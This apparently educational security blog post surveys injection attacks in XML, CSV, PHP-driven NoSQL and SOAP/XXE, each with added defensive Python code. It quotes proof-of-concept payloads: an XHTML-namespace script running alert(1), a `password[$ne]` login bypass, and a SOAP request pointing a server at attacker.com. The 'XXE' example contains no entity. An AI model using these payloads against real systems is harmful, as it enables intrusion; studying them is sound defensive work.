Five Interesting Injection Attacks

Nick Galbreath

Everyone is familiar with SQLi and XSS. To make things more interesting, here are five more unusual injection attacks that have appeared recently.

In no particular order:

XSS in your XML

This “XSS in XML” exploit appears to work in Chrome but not Safari (and I didn’t test it in Firefox).

http://sdl.me/XSSDemo/xss-xml-frames.html

Another XSS in your XML

<x:script xmlns:x="http://www.w3.org/1999/xhtml" src="data:,alert(1)" />

http://vulnerabledoma.in/char_test?mime=text/xml&body=%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%20src=%22data:,alert(1)%22%20/%3E

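Both XML-XSS items above share one mechanism: a browser that renders a text/xml response treats elements in the XHTML (or SVG) namespace as live markup, so a script element smuggled into an otherwise harmless XML document runs. The following is an added example, not code from the original post: a small Python check that walks an XML document with the standard library's ElementTree, flags elements in scriptable namespaces and event-handler attributes, and chooses response headers that only allow inline rendering when nothing active was found. The namespace list, the function names and the header policy are this example's own assumptions.

```python
import xml.etree.ElementTree as ET

# Namespaces whose elements a browser executes when it renders a text/xml
# response inline. Constructed for this example and not exhaustive: XHTML
# covers <script>, <iframe> and <object>; SVG covers <script> and event
# attributes.
ACTIVE_NAMESPACES = {
    "http://www.w3.org/1999/xhtml",
    "http://www.w3.org/2000/svg",
}


def _split_qname(qname: str):
    """ElementTree spells namespaced names as '{uri}local'; return (uri, local)."""
    if qname.startswith("{"):
        uri, _, local = qname[1:].partition("}")
        return uri, local
    return "", qname


def find_active_content(xml_text: str) -> list[str]:
    """Return one finding per element or attribute that a browser could execute
    if this document were rendered inline as XML."""
    root = ET.fromstring(xml_text)
    findings = []
    for elem in root.iter():
        ns, local = _split_qname(elem.tag)
        if ns in ACTIVE_NAMESPACES:
            findings.append(f"element <{local}> in namespace {ns}")
        for attr in elem.attrib:
            _, attr_local = _split_qname(attr)
            # Conservative: any on* attribute is reported, whatever its namespace.
            if attr_local.lower().startswith("on"):
                findings.append(f"event handler attribute {attr_local!r} on <{local}>")
    return findings


def response_headers_for(xml_text: str) -> dict:
    """Headers for serving caller-supplied XML (policy assumed for this example):
    render inline only when no active content was found, otherwise force a
    download so the browser never interprets the markup."""
    headers = {
        "Content-Type": "text/xml; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
    }
    if find_active_content(xml_text):
        headers["Content-Type"] = "application/octet-stream"
        headers["Content-Disposition"] = "attachment"
    return headers


# Constructed inputs: the payload quoted above and a harmless catalogue.
PAYLOAD = '<x:script xmlns:x="http://www.w3.org/1999/xhtml" src="data:,alert(1)" />'
BENIGN = '<catalog><item id="1">book</item></catalog>'

if __name__ == "__main__":
    for doc in (PAYLOAD, BENIGN):
        print(find_active_content(doc), response_headers_for(doc))
```

The check is a detection aid, not a sanitizer: the robust fix for content you reflect from users is still to never serve it under a content type the browser will render, which is what the header policy above enforces whenever a finding exists.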

CSV Injection

Yes, “Comma Separated Value” injection. Really??? See https://blog.zsec.uk/csv-dangers-mitigations/ for the details. The advice is the usual:

It should also be considered that all user input should not be trusted and, as a result, any output should be encoded.
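“Encode the output” is concrete for CSV: a cell whose first character is one of `=`, `+`, `-` or `@` (or a tab or carriage return) is evaluated as a formula by spreadsheet software, so an exported value must be forced back into text. The code below is an added example, not from the post or the linked article: it neutralizes formula-leading cells with a leading apostrophe, passes real numbers through untouched, and quotes every cell so that embedded quotes and separators cannot break the cell boundary. The trigger set, the leading-whitespace rule and the function names are this example's assumptions.

```python
import csv
import io

# Characters that make a spreadsheet evaluate a cell as a formula. Tab and
# carriage return are included because some importers treat them as field
# separators after which a following '=' starts a formula.
FORMULA_TRIGGERS = frozenset("=+-@\t\r")


def neutralize_cell(value) -> str:
    """Return a string that a spreadsheet will display as text.

    Real numbers pass through unchanged so that -5 stays numeric. Any other
    value whose first non-blank character is a trigger gets a leading
    apostrophe, which spreadsheets render as plain text. The string "-5" is
    therefore escaped too: that trade-off is deliberate for untrusted data.
    """
    if isinstance(value, (int, float)) and not isinstance(value, bool):
        return str(value)
    text = "" if value is None else str(value)
    # Leading whitespace is not protection: look at the first non-blank char.
    if text.lstrip()[:1] in FORMULA_TRIGGERS:
        return "'" + text
    return text


def write_csv(rows) -> str:
    """Serialise rows of arbitrary values to CSV text with every cell quoted.

    QUOTE_ALL wraps each cell in double quotes and doubles any embedded quote,
    so a value cannot escape its cell; neutralize_cell stops a value from being
    evaluated once the file is opened.
    """
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\r\n")
    for row in rows:
        writer.writerow([neutralize_cell(cell) for cell in row])
    return buf.getvalue()


# Constructed sample export: a header row, a formula-shaped note, a negative
# number, and a value containing quotes.
SAMPLE_ROWS = [
    ["name", "balance", "note"],
    ["alice", -5, "=1+1"],
    ["bob", 12, 'say "hi"'],
]

if __name__ == "__main__":
    print(write_csv(SAMPLE_ROWS), end="")
```

Apply the neutralization at the export boundary only; the stored value stays as the user entered it, so other consumers (an API, a database report) are not handed a stray apostrophe.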

NoSQL Injection

This should really be “NoSQL injection using PHP”, as the techniques appear to be specific to PHP’s drivers.

This may or may not be a re-hash of “Analysis and Mitigation of NoSQL Injections”, which came out a few months earlier. From its abstract:

NoSQL data storage systems have become very popular due to their scalability and ease of use. Unfortunately, they lack the security measures and awareness that are required for data protection. Although the new data models and query formats of NoSQL data stores make old attacks such as SQL injections irrelevant, they give attackers new opportunities for injecting their malicious code into the statements passed to the database. Analysis of the techniques for injecting malicious code into NoSQL data stores provides examples of new NoSQL injections as well as Cross-Site Request Forgery attacks, allowing attackers to bypass perimeter defenses such as firewalls. Analysis of the source of these vulnerabilities and present methodologies can mitigate such attacks. Because code analysis alone is insufficient to prevent attacks in today’s typical large-scale deployment, certain mitigations should be done throughout the entire software life cycle.
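The PHP-specific part is that the language turns a request parameter written as `name[sub]=value` into an associative array, and the MongoDB driver happily accepts that array as a query document, so a field the developer expected to be a string becomes an operator expression. The following is an added example, not from the post or either linked source, and it models the mechanism in Python rather than PHP: a small parser that reproduces PHP's bracket handling (one level only), a recursive check for `$`-prefixed operator keys, and a login-filter builder that refuses anything that is not a plain string. The query-string sample, the function names and the single-level bracket model are this example's own assumptions.

```python
import re
from urllib.parse import parse_qsl

# Matches name[sub]; only one bracket level is modelled (constructed for this
# example), which is enough to show a scalar field turning into a document.
_BRACKET_KEY = re.compile(r"^([^\[\]]+)\[([^\[\]]*)\]$")


def php_style_parse_qs(query: str) -> dict:
    """Mimic how PHP populates $_GET/$_POST: 'a[b]=c' becomes {'a': {'b': 'c'}}."""
    params = {}
    for key, value in parse_qsl(query, keep_blank_values=True):
        match = _BRACKET_KEY.match(key)
        if match:
            name, sub = match.groups()
            params.setdefault(name, {})[sub] = value
        else:
            params[key] = value
    return params


def has_operator_keys(value) -> bool:
    """True if any key anywhere in the structure starts with '$', the prefix
    MongoDB uses for query operators. Useful as a detection signal on
    request bodies even when the application itself is not yours to fix."""
    if isinstance(value, dict):
        return any(str(k).startswith("$") or has_operator_keys(v)
                   for k, v in value.items())
    if isinstance(value, list):
        return any(has_operator_keys(v) for v in value)
    return False


def build_login_filter(params: dict) -> dict:
    """Build the lookup filter for a login from parsed request parameters.

    Both fields must be plain strings; rejecting anything else closes the
    hole regardless of what the driver would accept. (A real application
    compares a password hash instead of matching the password in the query;
    the shape of the type check is the same.)
    """
    username = params.get("username")
    password = params.get("password")
    if not isinstance(username, str) or not isinstance(password, str):
        raise ValueError("username and password must be plain strings")
    return {"username": username, "password": password}


# Constructed request samples: an ordinary login and one where the password
# parameter has been rewritten with bracket syntax.
NORMAL_QS = "username=admin&password=s3cret"
BRACKET_QS = "username=admin&password[$ne]=x"

if __name__ == "__main__":
    for qs in (NORMAL_QS, BRACKET_QS):
        parsed = php_style_parse_qs(qs)
        print(parsed, "operator keys:", has_operator_keys(parsed))
        try:
            print("filter:", build_login_filter(parsed))
        except ValueError as exc:
            print("rejected:", exc)
```

The type check is the real fix; `has_operator_keys` is a secondary signal for logging or a WAF rule, since a driver that accepts arrays will also accept operators nested inside legitimate-looking structures.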

XXE Injection

XXE Injection is always a bit of a weirdo.

By uploading an XML file with an external XML entity, you can make the server send or retrieve arbitrary files or URLs. The example here is:

<SOAP-ENV:Envelope
  xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
  xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <SOAP-ENV:Body>
    <m:XXX xmlns:m="http://sap.com/monitoring/ws/sn/">
      <url>attacker.com</url>
    </m:XXX>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
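The defensive side of XXE is simple to state: a parser that handles uploaded XML must never declare or resolve entities, and any URL the document asks the server to contact must be checked against an allowlist before anything is fetched. The following is an added example, not code from the post or from the product the request targets: it drives Python's expat parser directly, rejects any DOCTYPE, entity declaration or external entity reference with an exception, extracts leaf text values, and validates the `url` field the way a monitoring endpoint receiving the request above should. The allowed-host set, the exception class and the function names are this example's assumptions.

```python
import xml.parsers.expat as expat
from urllib.parse import urlparse


class UnsafeXML(ValueError):
    """Raised when a document tries to declare or reference entities."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    raise UnsafeXML(f"DOCTYPE {name!r} rejected: uploaded XML may not carry a DTD")


def _reject_entity_decl(name, is_param, value, base, system_id, public_id, notation):
    raise UnsafeXML(f"entity declaration {name!r} rejected")


def _reject_external_ref(context, base, system_id, public_id):
    raise UnsafeXML(f"external entity reference to {system_id!r} rejected")


def parse_untrusted_xml(data: bytes) -> dict:
    """Parse XML from the network without ever resolving an entity.

    Returns {local element name: text} for leaf elements with non-blank text,
    which is all a handler for the SOAP request above needs. Exceptions raised
    inside expat handlers propagate out of Parse(), so the first forbidden
    construct aborts the parse before any entity is touched.
    """
    parser = expat.ParserCreate(namespace_separator=" ")
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parser.StartDoctypeDeclHandler = _reject_doctype
    parser.EntityDeclHandler = _reject_entity_decl
    parser.ExternalEntityRefHandler = _reject_external_ref

    values = {}
    open_elements = []  # stack of (local name, [text fragments])

    def start(name, attrs):
        # With namespace_separator=" " a name looks like "<uri> <local>".
        open_elements.append((name.rpartition(" ")[2], []))

    def chars(text):
        if open_elements:
            open_elements[-1][1].append(text)

    def end(name):
        local, fragments = open_elements.pop()
        text = "".join(fragments).strip()
        if text:
            values[local] = text

    parser.StartElementHandler = start
    parser.CharacterDataHandler = chars
    parser.EndElementHandler = end
    parser.Parse(data, True)
    return values


def url_is_allowed(url: str, allowed_hosts: frozenset) -> bool:
    """Only absolute http(s) URLs whose host is on the allowlist may be fetched.
    A bare host name such as 'attacker.com' parses as a path, so it fails too."""
    parts = urlparse(url)
    return (parts.scheme in ("http", "https")
            and parts.hostname is not None
            and parts.hostname.lower() in allowed_hosts)


# Constructed allowlist for the example; a real deployment derives it from config.
ALLOWED_MONITOR_HOSTS = frozenset({"monitor.internal.example"})

# Constructed copies of the request above and of a minimal document that
# declares an external entity (placeholder URL).
SAMPLE_REQUEST = b"""<SOAP-ENV:Envelope
  xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
  <SOAP-ENV:Body>
    <m:XXX xmlns:m="http://sap.com/monitoring/ws/sn/">
      <url>attacker.com</url>
    </m:XXX>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>"""

ENTITY_REQUEST = (b'<?xml version="1.0"?>'
                  b'<!DOCTYPE r [<!ENTITY ext SYSTEM "http://example.invalid/x">]>'
                  b"<r>&ext;</r>")

if __name__ == "__main__":
    fields = parse_untrusted_xml(SAMPLE_REQUEST)
    print(fields, "allowed:", url_is_allowed(fields["url"], ALLOWED_MONITOR_HOSTS))
    try:
        parse_untrusted_xml(ENTITY_REQUEST)
    except UnsafeXML as exc:
        print("rejected:", exc)
```

Rejecting the DOCTYPE outright is the simplest rule and the one to prefer for uploads; the entity handlers are kept as a second line in case a future change re-enables DTD processing somewhere else in the stack.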